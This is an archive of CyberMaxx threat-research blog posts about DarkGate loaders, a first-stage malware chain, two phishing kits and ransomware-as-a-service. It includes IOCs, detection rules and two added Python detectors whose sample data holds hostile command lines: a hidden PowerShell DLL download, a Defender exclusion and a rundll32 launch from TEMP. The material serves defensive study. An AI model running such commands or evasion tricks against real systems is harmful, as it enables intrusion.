Malware Archives | CyberMaxx https://www.cybermaxx.com/resources/category/malware/

DarkGate Malware: Initial Loaders and How to Mitigate Issues https://www.cybermaxx.com/resources/darkgate-malware-initial-loaders-and-how-to-mitigate-issues/ Tue, 24 Oct 2023 17:05:01 +0000

The post DarkGate Malware: Initial Loaders and How to Mitigate Issues appeared first on CyberMaxx.

This post focuses on the initial loaders we have observed over the past few weeks, which have been used in attempts to download various strains of malware, the most frequent of which is currently DarkGate.

Our recent findings show DarkGate being delivered through Microsoft Teams by means of a message from an external user to an internal user. The message contains a .zip file that, when opened, directs the user to the sender's SharePoint site where the .zip file can be downloaded. The .zip file contains a malicious LNK file that appears to be a PDF document. Once the downloaded file is clicked it is executed, and the commands it contains use cURL to download and execute Autoit3.exe together with a script ending in .au3. When this script runs, AutoIt writes a new file that contains the shellcode.

Mitigation

To prevent this within Microsoft Teams, we recommend allowing Teams chat requests only from specific external domains where possible. Safe Attachments and Safe Links, the security features available for Teams, are currently not able to block or detect this threat. More information on chat settings can be found at: https://learn.microsoft.com/en-us/microsoftteams/trusted-organizations-external-meetings-chat?tabs=organization-settings

Variant 1:

Stage 2 is a PE32 executable: c56b5f0201a3b3de53e561fe76912bfd

Stage 3 is ASCII text loaded by the executable: 76180a9afe940ee701f557847b60dd14

The above sample is the most common pattern we have observed in recent weeks. It uses uncommon request headers to pull down the second- and third-stage payloads before the execution chain using Autoit3 begins. Use of http in the command line, port 2351 and single-letter directories are all in use here. All of these behavioural items provide excellent indicators of compromise (IOCs) and can be found at the end of this post.

Variant 2: LNK

This file was designed to look like a PDF on delivery and was transported via Teams. If the user attempted to open the file, the shortcut file (.lnk) would be executed.

In the above screenshot we can see the malicious use of this shortcut file to call PowerShell and pass in an argument to retrieve a malicious .hta file from the attacker's infrastructure. This then led into the typical attack chain using .au3 files with Autoit3.exe. The indicators can be found in the IOCs section below.

Variant 3: VBS

In this example a maldoc was received which called back out and retrieved a DarkGate sample. Below is a screenshot of the original sample we received:

Tidied up slightly for readability:

We were unable to retrieve the second stage in this example at the time of analysis, even with dynamic analysis, setting custom user agents, etc. Again, we see HTTP requests made from the command line, with port 2351 being used.

IOCs

Notes:

  • Typical use of non-standard user-agents, “a”, “curl”, etc.
  • Commonly uses IP addresses directly via http in the cmdline
  • We commonly see malware hosted on port 2351 across multiple variants and samples; this may be a default port for this version. Single-letter directories are another common pattern. Look for uncommon user agents reaching out to port 2351, particularly if the source process appears to be cmd or another scripting interpreter.
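
As an added example (not code from the CyberMaxx post), the following Python scores constructed EDR-style outbound-request events against the notes above: non-standard user agents, a literal IP as the host, port 2351, single-letter directories and a scripting interpreter as the source process. The `proc=... dst=... ua=... path=...` event format, the RFC 5737 documentation addresses and the `.test` domain are assumptions of the example; the URL paths are taken from the post's URL list.

```python
import re
from typing import Dict, List, Tuple

# Constructed EDR-style outbound-request events for this example. The
# documentation-range IPs (RFC 5737) and the .test domain are made up; the
# URL paths are the ones listed in the post's IOC section.
SAMPLE_EVENTS = [
    "proc=cmd.exe dst=203.0.113.10:2351 ua=a path=/hzuhmgws",
    "proc=powershell.exe dst=203.0.113.11:8080 ua=Mozilla/5.0 path=/TMDT.hta",
    "proc=cmd.exe dst=198.51.100.7:80 ua=curl path=/A/S",
    "proc=chrome.exe dst=198.51.100.8:443 ua=Mozilla/5.0 path=/index.html",
    "proc=autoit3.exe dst=203.0.113.10:2351 ua=curl path=/msihzuhmgws",
    "proc=wscript.exe dst=example-files.test:2351 ua=a path=/lpfdokkq",
]

# Command-line and scripting hosts that rarely issue their own HTTP requests.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "autoit3.exe"}
# User-Agent values the post calls out as non-standard.
SUSPECT_AGENTS = {"a", "curl"}
# Destination port repeatedly seen hosting the payloads.
SUSPECT_PORT = 2351

IPV4_HOST = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
# A path segment that is a single letter, e.g. the /A/S directory.
SINGLE_LETTER_DIR = re.compile(r"(?:^|/)[A-Za-z](?=/|$)")
EVENT_RE = re.compile(r"proc=(\S+) dst=(\S+):(\d+) ua=(\S+) path=(\S+)$")


def parse_event(line: str) -> Dict[str, object]:
    """Parse one constructed key=value event line into a dict."""
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    proc, host, port, ua, path = m.groups()
    return {"proc": proc.lower(), "host": host, "port": int(port),
            "ua": ua, "path": path}


def score_event(ev: Dict[str, object]) -> Tuple[int, List[str]]:
    """Count how many of the post's behavioural indicators an event matches."""
    reasons = []
    if str(ev["ua"]).lower() in SUSPECT_AGENTS:
        reasons.append("non-standard user-agent")
    if IPV4_HOST.match(str(ev["host"])):
        reasons.append("literal IP address instead of hostname")
    if ev["port"] == SUSPECT_PORT:
        reasons.append(f"destination port {SUSPECT_PORT}")
    if SINGLE_LETTER_DIR.search(str(ev["path"])):
        reasons.append("single-letter directory in URL path")
    if ev["proc"] in SCRIPT_HOSTS:
        reasons.append("request issued by a scripting interpreter")
    return len(reasons), reasons


def triage(lines: List[str], threshold: int = 3) -> List[Tuple[str, int, List[str]]]:
    """Return (line, score, reasons) for events that meet the threshold."""
    hits = []
    for line in lines:
        score, reasons = score_event(parse_event(line))
        if score >= threshold:
            hits.append((line, score, reasons))
    return hits


if __name__ == "__main__":
    for line, score, reasons in triage(SAMPLE_EVENTS):
        print(f"[{score}] {line}\n      " + "; ".join(reasons))
```

The PowerShell request for the .hta on port 8080 scores only 2 with these notes-derived indicators, which is the kind of gap to keep in mind when tuning the threshold for your own telemetry.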

URLs:

  • hxxp[:]//185.39.18.170/A/S
  • hxxp[:]//5.188.87.58:2351/hzuhmgws
  • hxxp[:]//5.188.87.58:2351/msihzuhmgws
  • hxxp[:]//148.113.1.180:8080/TMDT.hta
  • hxxp[:]//fredlomberfile.com:2351/lpfdokkq

IP:

Threat Research Series: Evasion and Fileless Persistence from First-Stage Malware https://www.cybermaxx.com/resources/threat-research-series-evasion-and-fileless-persistence-from-first-stage-malware/ Tue, 04 Apr 2023 05:30:18 +0000

The post Threat Research Series: Evasion and Fileless Persistence from First-Stage Malware appeared first on CyberMaxx.

In order to help foster collective intelligence among the cybersecurity community, CyberMaxx publishes insights and examples of active phishing kits uncovered during our threat research. We believe that by sharing the intelligence available to us with the broader cybersecurity community, organizations can more effectively stay ahead of the ever-evolving threats we all face.

In this series, we will largely be documenting some of the research we have done into how common criminals are also victimizing the general public, a topic often ignored by the industry.

These posts are meant to be educational and informative. In no way are they commenting on the teams and organizations that were targeted. Everyone is under attack. These threats negatively impact the operations of corporations and government entities as well as the lives of innocent consumers.

The CyberMaxx Offensive security team uncovers these in our routine threat research, not during specific client engagements.

Evasion and Fileless Persistence from First-Stage Malware

Dealing with malware infections at the earliest possible stage is crucial, as they have the potential to cause significant damage and lead to further, more serious compromises. Malware comes in different shapes and sizes, and many families of malicious software follow similar patterns when launching their initial attacks. They often use an initial loader to download secondary and tertiary payloads, which can then carry out various nefarious activities.

One common tactic used by malware is to perform an enumeration of the network surrounding the initial point of intrusion. This means that the malware tries to identify all the devices and services present on the network, which can provide the attacker with valuable information to launch further attacks. The malware may also attempt to establish persistence on the affected system, meaning that it tries to ensure that it remains active even after a system reboot or other measures to remove the infection.

It’s essential to recognize that malware is just a tool used by attackers to achieve their objectives. It’s like an automation of their intentions, allowing them to carry out their attacks on a large scale without being physically present. That’s why it’s critical to address malware infections early on, as they can lead to significant harm and even ransomware attacks, where attackers lock down your system until you pay them a ransom. So always stay vigilant and be proactive in protecting your systems from malware.

This particular infection appears to be the first stage of a larger infection chain which ultimately failed due to the infrastructure hosting further payloads no longer being available.

Technical Analysis

A spear-phishing campaign against individuals within an organization delivers a password-protected attachment with instructions on how to open it. Opening this archive reveals a .html file which, when opened, attempts to impersonate an Office 365 page. This page also instructs the user on how to open the auto-downloaded zip archive ‘objectionablyQuillets.zip’. The email itself was structured so as to appear as though the recipient had already replied to an existing chain and this was simply another response in a previous conversation.

Extracting the zip archive reveals a disc image file (.img) of the same name. Analysis of both the zip and the img archive reveals an initial defense evasion tactic employed to bypass Microsoft’s Mark of the Web (MOTW): by using a password-protected zip archive, the alternate data stream (ADS) is not updated on receipt, bypassing protections that would normally be put in place.

The image above shows the .zip archive carrying a second $DATA stream with a Zone.Identifier value of 3, i.e. marking the file as having been downloaded externally. The .img file unzipped from the same archive does not carry the second stream, bypassing MOTW.

Mounting the ‘objectionablyQuillets.img’ file as a browsable directory reveals several sub-directory listings and a large number of junk files designed to lower the entropy of the malware for defense evasion purposes. All directories and files except for the initial ‘tariffedBadgerweedPlying.lnk’ file are marked as hidden, in an attempt to have the user launch the shortcut file triggering the infection chain.

Stage 3: .lnk execution + attempted download

The top-level directory of the mounted archive contains a single viewable file: ‘tariffedBadgerweedPlying.lnk’. Analysis of the shortcut file reveals that it was created in Dec 2021, and its intended purpose is to launch one of three possible next stages. The file is linked to ‘Tanbur.exe’, which is a local copy of the Windows Command Prompt.

The cmd line arguments that follow launch a nested .cmd file as a set of instructions to be executed by ‘Tanbur.exe’.

The nested command line arguments employ minor obfuscation to mask their intended purpose. The ultimate goal was to copy legitimate copies of both wscript.exe and reg.exe into the user’s temp directory and mark them as hidden. It then attempts first to launch reg.exe with instructions from a nested file, and then to launch a script file via the copied wscript.exe, the latter employing a nested job within the .wsf / JScript.

Another form of evasion is employed here: the malicious script is base64-encoded and pushed into the user’s registry, then read back at a later stage to be decoded and executed.

In the image below the base64 script that was nested in the user’s registry is decoded to reveal its objective.

The script file includes several measures to hinder forensic efforts: deleting the registry keys that were added under the Forestage.qj import, attempting to reflectively load the malware into memory, and adding Defender exclusions for the location it is running from. Additional persistence mechanisms are also removed here.

We can also see attempts to download a .dll file from an external address into the user’s temp folder and load it via rundll32 with N115 operating as the OEP. This is the final successful stage of the sample that was observed; the attempted download failed because the infrastructure was no longer live.

IOCs, TTPs, and Detection strategies

Sample SentinelOne STAR Rules:

  • ‘Invoke-WebRequest’ + ‘http|https|ftp’ + ‘IP address’.
    CmdLine RegExp "\b(https?|ftp):\/\/\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" AND CmdLine In Contains Anycase ("invoke-webrequest", "start-bitstransfer", "system.net.webclient")
  • ‘Add-MpPreference’ (Defender exclusion list)
    CmdLine ContainsCIS "Add-MpPreference"
  • ‘Rundll32’ + ‘$env:TEMP’
    CmdLine RegExp "^.*?\brundll32\b.*?\benv:temp\b.*?$"
  • ‘xcopy’ + ‘reg.exe’ | ‘wscript.exe’
    CmdLine ContainsCIS "xcopy" AND CmdLine In Contains Anycase ("reg.exe", "wscript.exe", "cscript.exe", "mshta.exe")
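
The four STAR rules above rendered in Python, as an added example (not the post's code and not SentinelOne query syntax), run over constructed process command lines modelled on the chain described in this post. The command lines, the RFC 5737 address 203.0.113.5 and the file names are assumptions of the example.

```python
import re
from typing import Callable, Dict, List

# Constructed process command lines modelled on the chain described above
# (download to %TEMP%, Defender exclusion, rundll32 from %TEMP%, copying a
# script host). 203.0.113.5 is an RFC 5737 documentation address and the
# file names are made up for this example.
SAMPLE_CMDLINES = [
    r'powershell -nop -w hidden -c "Invoke-WebRequest http://203.0.113.5/x.dll -OutFile $env:TEMP\loader.dll"',
    r'powershell -c "Add-MpPreference -ExclusionPath $env:TEMP"',
    r'powershell -c "rundll32 $env:TEMP\loader.dll,N115"',
    r'cmd /c xcopy /h /y C:\Windows\System32\wscript.exe %TEMP%\ && attrib +h %TEMP%\wscript.exe',
    r'cmd /c xcopy /s /e C:\data D:\backup',                                 # benign copy
    r'powershell -c "Invoke-WebRequest https://updates.example.com/a.ps1"',  # DNS name, not an IP
]

# Rule 1: a download cmdlet plus a URL whose host is a literal IPv4 address.
IP_URL = re.compile(r"\b(?:https?|ftp)://(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b", re.I)
DOWNLOAD_TOKENS = ("invoke-webrequest", "start-bitstransfer", "system.net.webclient")
# Rule 3: rundll32 loading something referenced via $env:TEMP.
RUNDLL_TEMP = re.compile(r"\brundll32\b.*?\benv:temp\b", re.I)
# Rule 4: xcopy of a script host or the registry tool.
COPIED_HOSTS = ("reg.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def contains_any(cmdline: str, needles) -> bool:
    """Case-insensitive substring test, like STAR's 'In Contains Anycase'."""
    low = cmdline.lower()
    return any(n in low for n in needles)


def rule_ip_download(cmdline: str) -> bool:
    return bool(IP_URL.search(cmdline)) and contains_any(cmdline, DOWNLOAD_TOKENS)


def rule_defender_exclusion(cmdline: str) -> bool:
    return "add-mppreference" in cmdline.lower()


def rule_rundll32_temp(cmdline: str) -> bool:
    return bool(RUNDLL_TEMP.search(cmdline))


def rule_xcopy_script_host(cmdline: str) -> bool:
    return "xcopy" in cmdline.lower() and contains_any(cmdline, COPIED_HOSTS)


RULES: Dict[str, Callable[[str], bool]] = {
    "ip_download": rule_ip_download,
    "defender_exclusion": rule_defender_exclusion,
    "rundll32_temp": rule_rundll32_temp,
    "xcopy_script_host": rule_xcopy_script_host,
}


def evaluate(cmdline: str) -> List[str]:
    """Names of the rules that fire on one command line, in rule order."""
    return [name for name, fn in RULES.items() if fn(cmdline)]


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(evaluate(cmd) or "-", cmd)
```

The last sample shows the limit of rule 1 as written: a download from a DNS name rather than a literal IP does not fire, so a second rule keyed on the destination or the `-OutFile` location is needed to cover that case.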

Further Detection Strategies

ISO / IMG / ZIP archives containing .lnk files. These typically invoke a process to parse scripts and arguments, e.g. cscript, PowerShell, cmd, etc. Due to administrative usage, this activity may be normal in your environment.

Threat Research Series: Investigating a Phishing Campaign Targeting Users of the Australian MyGov Service https://www.cybermaxx.com/resources/threat-research-series-investigating-a-phishing-campaign-targeting-users-of-the-australian-mygov-service/ Tue, 21 Mar 2023 14:30:00 +0000

The post Threat Research Series: Investigating a Phishing Campaign Targeting Users of the Australian MyGov Service appeared first on CyberMaxx.

CyberMaxx Threat Research Series

Australian MyGov

Recently, a new phishing campaign has been discovered targeting users of the Australian MyGov service. MyGov is a platform that allows Australian citizens to access online government services such as tax and welfare payments. The phishing campaign is designed to trick users into disclosing their personal information, such as login credentials, by directing them to a fake MyGov login page. Cybersecurity experts have warned that this campaign could result in severe data breaches and financial losses for MyGov users. In this context, it is crucial to stay vigilant and take necessary measures to protect personal information from cybercriminals.

Typically, reports on cyber attacks and malicious infrastructure are released after the security community has already taken measures to address the threat, rendering it inactive or “dead”. This time gap between the discovery and reporting of cyber threats is due to the time required for analysis, investigation, and verification of the data gathered. Moreover, it is essential to ensure the accuracy and reliability of the information before sharing it with the public to avoid causing unnecessary panic or false alarms. Additionally, delayed reporting can be beneficial as it allows analysts to collect more information about the attack and better understand its techniques, tactics, and procedures. This knowledge can then be used to prevent similar attacks in the future and improve the overall cybersecurity posture of an organization or community.

Digging In

While looking through logs of reported phishing campaigns, our analysts came across a campaign using a compromised webserver to host a phishing panel targeting Australians who use the MyGov service.

In this example from the wild, this simple phishing scam is intended to collect personal details and login credentials from users of the Australian MyGov service.

The Australian MyGov service is a platform that offers access to a range of government services, including taxes, benefits, and more. Due to the sensitive nature of the information stored in MyGov accounts, such as financial data and personal identification, gaining unauthorized access can be of significant value to cybercriminals and fraudsters. The potential for financial gain and identity theft makes MyGov accounts a prime target for cyber attacks, especially through phishing campaigns that aim to trick users into revealing their login credentials or other personal information.

The consequences of a successful attack on MyGov accounts can be severe, resulting in the loss of personal and financial information, fraudulent transactions, and other detrimental effects. Therefore, it is crucial to take necessary measures to protect MyGov accounts from unauthorized access and stay vigilant against phishing attempts or other cyber threats. Regularly updating passwords, enabling two-factor authentication, and monitoring account activity are some of the recommended practices to safeguard personal information on MyGov and prevent fraudulent activities.

First, let’s look at the “flow” of the scam, from the perspective of a user who clicked on the malicious link they got via SMS or email or whatever.

Scam Flow

The exact steps in a scam flow can vary depending on the type of scam and the specific tactics used by the scammer. However, here are some common steps that may be involved in a scam flow:

  1. Contact: The scammer makes contact with the victim, typically through a phone call, email, social media, or other online channels.
  2. Establish trust: The scammer may use various tactics to establish trust with the victim, such as posing as a legitimate company or authority figure, using personal information to make the scam seem more convincing, or creating a sense of urgency or fear.
  3. Present a fake offer: The scammer presents a fake or fraudulent offer to the victim, such as an investment opportunity, a prize or lottery win, or a request for payment for a fake service.
  4. Request payment or personal information: The scammer requests payment or personal information from the victim, typically by asking them to provide credit card information, bank account details, or other sensitive information.
  5. Pressure to act quickly: The scammer may pressure the victim to act quickly or make an immediate payment, often by threatening legal action or other consequences if they do not comply.
  6. Repeat: If the scam is successful, the scammer may continue to target the victim or sell their personal information to other scammers.

It is important to note that scams can take many different forms, and not all scams will follow this exact sequence. However, by being aware of these common steps, individuals can be better equipped to recognize and avoid potential scams.

How The Scammers Executed the Australian MyGov Phishing Campaign

Firstly, we are asked to log in. Sample credentials are entered in order to start going through the steps the scammers have created for this phishing campaign.

It notifies the users that the credentials are incorrect, forcing them to enter the sample credentials again. This is a surprisingly common pattern in these phishing kits – requesting the user to enter the password twice.

After the second failed attempt to access the account with the sample credentials, the system asks for a one-time password (OTP). We could find no backend mechanism for automatically forwarding the login information to the “real” MyGov system, and we aren’t knowledgeable about the MyGov OTP system. We aren’t sure whether the phisher is trying to do a session takeover in real time by hand, or whether this is part of the ruse to seem legit.

Now there is a request for our personal information. This is useful to scammers for actually conducting identity theft like account takeovers/resets.

We are being asked to provide an OTP (One-Time Password) again, similar to the process of entering our password twice. We believe that many kits do this in order to make the ruse seem more legitimate.

Finally we are bounced to the “success” page and, after a few seconds, to the real MyGov website.

In summary, this scam is relatively straightforward, but it can result in the theft of sensitive personal information, including login credentials and passwords, to a valuable government service.

Time to Dismantle the Scam

Acquiring a copy of the phishing kit was easy – appending “.zip” to the base directory of the phishing panel works quite often due to how these are deployed.

The scammer gains access to a web hosting account (e.g. by buying web-shell access from other hackers), uploads and unzips the scam package, and they are good to go. They often forget to delete the zip archive, which makes recovering the source code of their scam easy.

Looking at the kit’s structure, it is quite simple: some HTML/JS/CSS/images interact with a few PHP scripts. No database, nothing fancy. Just some HTML that sends data to some generic PHP scripts.

The “Email.php” file in the root directory contains the email logs and the email address of the presumed attackers. This file is included by other files.

It also logs to a file – as you can see in this screenshot from one of the other PHP files.

We decided to check if the kit had any victims. We were able to accomplish this by making a request to the hard-coded file in which it keeps its logs.

It had acquired a number of victims – not many, less than 20.

One possibility here for “disruption” activities against this phisher would be to write and execute a simple script to fill the logs with randomly generated information. This would also, due to its email feature, fill the victim’s inbox with junk.

This action was not performed during this investigation for obvious legal reasons.

In Summary

In conclusion, cybersecurity experts have warned about an ongoing phishing campaign targeting users of the Australian MyGov service. The phishing campaign aims to trick users into disclosing their personal information, such as login credentials, by directing them to a fake MyGov login page.

Given the sensitive nature of the information stored in MyGov accounts, such as financial data and personal identification, gaining unauthorized access can be of significant value to cybercriminals and fraudsters. The potential for financial gain and identity theft makes MyGov accounts a prime target for cyber attacks, especially through phishing campaigns that aim to trick users into revealing their login credentials or other personal information.

It is crucial to take necessary measures to protect MyGov accounts from unauthorized access and stay vigilant against phishing attempts or other cyber threats. Regularly updating passwords, enabling two-factor authentication, and monitoring account activity are some of the recommended practices to safeguard personal information on MyGov and prevent fraudulent activities. It is important to be aware of common steps involved in a scam flow and stay alert to potential scams, especially those targeting sensitive information such as MyGov accounts.

Finally, ongoing monitoring of less-targeted attacks, such as the one on the Australian MyGov service, is essential for improving our understanding of cyber threats and preventing similar attacks in the future.

Threat Research Series: Investigating a Phishing Campaign Targeting Users of the Navy Federal Credit Union https://www.cybermaxx.com/resources/threat-research-series-investigating-a-phishing-campaign-targeting-users-of-the-navy-federal-credit-union/ Tue, 07 Mar 2023 06:01:55 +0000

The post Threat Research Series: Investigating a Phishing Campaign Targeting Users of the Navy Federal Credit Union appeared first on CyberMaxx.

CyberMaxx Threat Research Series

Investigating a Phishing Campaign Targeting Users of the Navy Federal Credit Union

During one of our campaigns of collecting data on phishing kits, we came across one targeting users of the Navy Federal Credit Union.

Let us walk you through the flow of the scam.

When you click on the malicious link, you get served a rather decent simulacrum of the Navy Federal login page.

Can you tell the difference between these two screenshots?

When you are served the login page, it obviously requests you to log in.

So of course, we log in, twice. It tells us to enter our username and password twice. This is really common in these phishing kits.

We then get asked to enter our email and password – twice.

Now they have our login, password, our email, and our password.

But wait, these crooks want more!

Let’s give them our SSN and some other personal information.

Now, because we are feeling really generous, we give them our credit cards.

And we give them our security questions. Just in case they still are having a hard time defrauding us.

Finally, to allay suspicion after handing over pretty much every piece of PII imaginable, we get redirected to the real Navy Federal homepage.

So, to wrap up the “scam walkthrough” section, this kit steals the following information:

  • Usernames for Navy Federal
  • Passwords for Navy Federal
  • Email Address
  • Password
  • Address
  • Telephone Number
  • Social Security Number
  • MMN (Military Member Number?)
  • Driver’s Licence Expiry Date
  • Driver’s Licence State of Issue
  • Credit Card Number
  • CVV Number
  • Credit Card Expiry Number
  • Questions and Answers for Security Questions

That is quite a lot of data to lose to some stupid PHP script. I’d suggest that is plenty for a scammer to do a lot of damage to you.

Now, about those PHP scripts. We managed to recover the “phishing kit” package as a ZIP file from the compromised webserver being used to host the phishing site.

After unpacking the phishing kit, we see it has the below structure.

The files “index.php”, “quest.php”, “quest2.php” and “account.php” all simply display various HTML pages that send POST data to “next.php”. They also all include the “includes/antibot.php” file.

The “css” and “images” directories just contain CSS and images required to display the logos, formatting, etc.

Of the PHP files, the three of interest are “email.php”, “next.php”, and “includes/antibot.php”.

The file “email.php” simply defines an email address for logs to be sent to, and a URL for victims to be redirected to – the legitimate Navy Federal website.

The “next.php” file is kind of interesting: it contains the functions that handle sending the inputted data to the scammer’s email account.

I don’t know who “VeNzA” is, but they seem to be quite a prolific creator of scampages based on a cheeky Google search.

The “includes/antibot.php” page is actually more interesting. It seems to exist to try to prevent web scrapers/scanners run by people like us from finding the kit. It blocks based on IP addresses and user agents.

For readability reasons, here is a screenshot of the script with most of the “blocked” IPs and user agents deleted.

Note its use of wildcards/regular expressions in the IP addresses to block entire IP ranges, and its substring checks on the User-Agent header to block user agents it doesn’t like.

Further worth noting is that when it blocks you, it adds your user agent, IP address, and a date stamp to a logfile.

I might even speculate this is a way for the phishers to expand their blocklists – kind of a hostile threat intelligence, where silly whitehats are the threats.

[Screenshot: includes/antibot.php]

Overall, this kit is pretty tragically simple. For each “page” of information the victim supplies, the scammer gets an email. It is pretty much identical to a few other phishing kits we will be showing here; however, this one does have the twist of a rudimentary “anti-security researcher” protection to avoid being detected by web scanners/scrapers.

A future blog post will cover these “anti-whitehat” mechanisms in greater detail, as we have found several variations on the same theme, and they all are pretty interesting.

Borrowing some ideas from them could even be of value to red teams in avoiding their payloads getting ruined by antivirus companies and such.

What is Ransomware as a Service (RaaS)? https://www.cybermaxx.com/resources/what-is-ransomware-as-a-service-raas/ Mon, 30 Jan 2023 06:01:31 +0000
Ransomware has been a big problem for businesses in recent years, especially with the rise of remote and hybrid working brought about by the COVID-19 pandemic. This has made it harder for businesses to protect their data and systems from attack.

With a 13% increase from 2021 to 2022, equal to the past 5 years’ increases combined (Verizon DBIR), there are no signs that these attacks are going anywhere, and organizations and individuals need to be more vigilant than ever before.

What is RaaS?

Extortion or Ransomware as a Service (RaaS) can be thought of as an interpretation of the popular Software as a Service (SaaS) model, where users who may not have the time or skill to create and deploy their own ransomware purchase it on the dark web to infect their victims.

RaaS comes as a kit that is distributed to affiliates, and each kit has different features and benefits. Some RaaS kits include 24/7 support, user reviews, forums, and even offers to bundle services. Prices for a RaaS kit can range significantly, from $40 a month to thousands, depending on the kit needed. The average ransom demand in 2021 was $6 million.

How Does It Work?

The RaaS model follows this outline for operators and affiliates.

RaaS Operators:

  • Recruit affiliates on forums and the dark web
  • Give affiliates access to “build their own ransomware package”
  • Create a command and control dashboard to track the status of the package
  • Set up a victim payment portal
  • Assist with victim negotiations
  • Manage a dedicated leak site

RaaS Affiliates:

  • Pay to use the ransomware
  • Agree on the fee per collected ransom
  • Target victims
  • Set ransom demands
  • Create post-attack user messages
  • Compromise the victims
  • Execute the ransomware
  • Communicate with victims via chat portals or other channels
  • Manage decryption keys

4 common RaaS models:

  • Monthly subscription for a flat fee
  • Affiliate programs, which are the same as the monthly fee model but with a percentage of the profits (typically 20-30%) going to the ransomware developer
  • One-time license fee with no profit sharing
  • Pure profit sharing

RaaS is a quick and straightforward way to monetize malware. Through some refined RaaS portals, affiliates can create an account, pay with Bitcoin, monitor infection status and the files encrypted, scan their targets, and start making money. Ransomware providers offer a wide range of support options, from online communities, tutorials, and documentation to feature updates and other benefits, just like a traditional SaaS product.

Examples

CyberMaxx engineers have noted the following RaaS operations as noteworthy this year so far.

LockBit

LockBit has proven itself to be the world’s most prominent and active ransomware, more than doubling the average ransomware payment by targeting small-to-medium-sized organizations. Dubbed one of the most destructive pieces of software in modern history, LockBit encrypts nearly every file stored on an infected device and drops corresponding ransom notes on victims’ computers.

BlackCat

BlackCat is a notable ransomware family threatening users worldwide with a unique set of features: it is a possible rebranding of DarkSide, is written in Rust (a more secure programming language that offers improved performance and reliable concurrent processing), pays affiliates a comparatively larger share than similar schemes, and has launched one of the first public data leak sites.

Black Basta

Black Basta was only noticed in April 2022 but has become a major player in the RaaS business by using double extortion tactics and attack tools like the QakBot trojan and PrintNightmare exploit.

This ransomware family had multiple successful high-profile attacks back to back:

Black Basta shows no signs of slowing down. In June 2022 they released a new build of their ransomware stack that is designed to infect VMware ESXi virtual machines.

Monti

Monti is a relatively new ransomware that is thought to be the same group as, or a rebrand of, the Conti ransomware group. Monti encrypts files on Linux systems and possibly now Windows, and uses the extension “.puuuk”. Another characteristic of Monti is that they operate two separate Tor sites: one for hosting data stolen from victims and another for ransom negotiation.

Currently, the data leak website shows that almost all of the victims have paid their ransoms with the exception of one from Argentina.

Preventing RaaS

In order to help prevent becoming a victim of a RaaS attack, organizations need to develop a robust plan for data security to combat the growing trend of ransomware. Since a RaaS attack is so costly to recover from, organizations should consider leveraging solutions designed to detect and prevent threats.

CyberMaxx has identified the following best practices for preventing RaaS:

  • Reliable endpoint protections that work in the background 24/7 and can decipher complex algorithms
  • Back up systems and devices regularly (a few times a week)
  • Validate that the backups are working and test the backup/recovery process
  • Ensure backups are immutable
  • Store multiple backups in various locations
  • Maintain a patch program for vulnerabilities
  • Deploy anti-phishing protection
  • Train employees and improve security culture

Conclusion

With RaaS being an extremely lucrative business (revenues in 2021 were $20 billion), there is no doubt that we will continue to see it used more, especially with ransomware attacks rising by 13% that very same year.

There are many things an organization can do to protect against ransomware, but experts recommend being proactive, monitoring continuously, and automating responses to related and enabling attack elements (like phishing). Automation is critical because modern malware attacks move at machine speed and only machines can keep up.

Vulnerability and security incident management solutions can help the security, risk, and IT teams focus by providing playbooks that prioritize and direct action. Data collection, AI, and analytics can make everything less onerous, error-prone, and expensive.

Organizations can use systems to help them anticipate what is most important to their business or mission, optimize processes to minimize exposure, and react quickly when problems arise. This can help businesses avoid potential problems and keep operations running smoothly.

As ransomware attacks continue to grow, it is more important than ever for organizations to have a well-orchestrated IT security infrastructure in place. By doing so, they will be better equipped to weather any malicious attack with less cost and disruption.

2022 in Review…well, most of it, a lot happened https://www.cybermaxx.com/resources/2022-in-review-well-most-of-it-a-lot-happened/ Wed, 28 Dec 2022 21:59:59 +0000
With 2023 right around the corner, we at CyberMaxx wanted to recap some of the big events that happened in 2022.

Threat actors continue to get smarter and find ways to cause chaos for organizations, but it’s not all doom and gloom, as the good defenders stay one step ahead with people, processes, and technology to help organizations avoid becoming the victim of a breach.

Russia’s Cyber-attacks on Ukraine

Starting the year off, the world saw Russian state-sponsored cyber operations deploy DDoS attacks, SMS spam campaigns, wiper malware, attacks on air traffic control, and Sandworm malware on Linux systems.

Not stopping there, Russia also used phishing emails against Ukrainian military personnel, the Conti ransomware gang, and a two-component malware called FoxBlade for DDoS attacks.

The list continues extensively through the year, as the conflict between Russia and Ukraine has escalated into a full-on war.

Healthcare is Still a Top Target (And Probably Always Will Be)

The healthcare industry continues to be a top target for cybercriminals, with 849 incidents, 571 of which resulted in data exposure (Verizon DBIR 2022 Report).

Healthcare also remains at #1 for the most costly data breaches among all industries, reaching $10.10 million this year and expected to grow year over year for the foreseeable future (IBM Cost of a Data Breach).

The list of individual organizations affected by cyberattacks this year is extensive, so we will only go over a few, in no particular order:

  • Eye Care Leaders (ECL) – ECL experienced the largest and most headline-grabbing breach reported this year, with approximately 3.6 million patients affected. There was plenty of drama associated with this ransomware attack because of the timing in which the vendor reported the attacks. Several providers filed a lawsuit against the practice management system vendor for “concealing” multiple ransomware attacks and related outages. ECL notified the impacted providers, but not until after the 30-day timeframe required by HIPAA, prompting many patient-led lawsuits.
  • Advocate Aurora Health – In late October, Advocate Aurora reported the disclosure of protected health information to Google and Facebook because of the use of Pixels on their patient portals, website, and applications. The pixels have been removed but not before almost 3 million patients’ IP addresses, insurance information, proxy names, locations, procedure types, and appointment times were leaked. Advocate Aurora is currently defending itself against multiple class action lawsuits in the wake of the Pixel outcome.
  • Connexin Software – Pediatric electronic medical records and practice management software vendor, Connexin Software, experienced a network hack and data theft in early December that affected 119 provider offices and some 2.2 million patients. The threat actor gained access to offline patient data used for troubleshooting and removed it from the network. Data stolen includes: names, contact details, SSNs, guarantor names, parent or guardian names, dates of birth, highly specific health insurance information, treatments, procedures, diagnoses, prescriptions, provider names, medical record numbers, and billing and/or claims data.

Additionally, this year 90% of the 10 biggest healthcare breaches were the result of third-party vendors being infiltrated.

This is on trend with 2021, when vendors were responsible for 60% of the 10 largest healthcare breaches. There is an obvious need for organizations to revisit relationships and contracts with vendors to assess security measures and how these third parties are protecting themselves from potential breaches.

